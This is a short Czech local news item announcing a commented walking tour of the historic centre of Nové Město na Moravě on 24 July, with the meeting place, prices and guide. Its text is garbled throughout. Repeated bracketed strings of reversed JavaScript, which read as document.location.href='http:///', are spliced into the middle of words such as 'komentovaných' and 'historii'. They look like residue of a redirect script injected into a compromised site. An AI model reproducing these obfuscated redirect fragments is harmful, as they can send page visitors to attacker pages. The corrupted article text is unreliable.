Rainbow page separator

Nejenom turisté se mohou seznámit s osudy novoměstských domů

Pondělí, 18. července 2022

Nové Měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to na Moravě / Na další z komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných procházek po his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torickém centru Nového Města se mohou zájemci těšit v neděli 24. července. Sraz je v 17 hodin před Horáckým muzeem na Vratislavově náměstí, vstupné je 50 korun pro dospělé a 30 pro děti, seniory a studenty, přičemž po městě příchozí při zhruba hodinu trvající procházce s výkladem provede průvodce Adam Dostál. Ten je současně seznámí nejenom s his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torií města, ale i s osudy zajímavých majitelů či obyvatel některých novoměstských domů či dalších významných osobností spojených s městem.
Účastníci komen[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaných prohlídek památkové zóny, které se v Novém Městě konají už od roku 2014, mohou zavítat například i do mázhauzu a sklepa jedné z nejstarších budov ve městě, případně se dozvědět řadu pozoruhodností nejenom z její his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torie, ale i dalších objektů v his[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];torickém centru.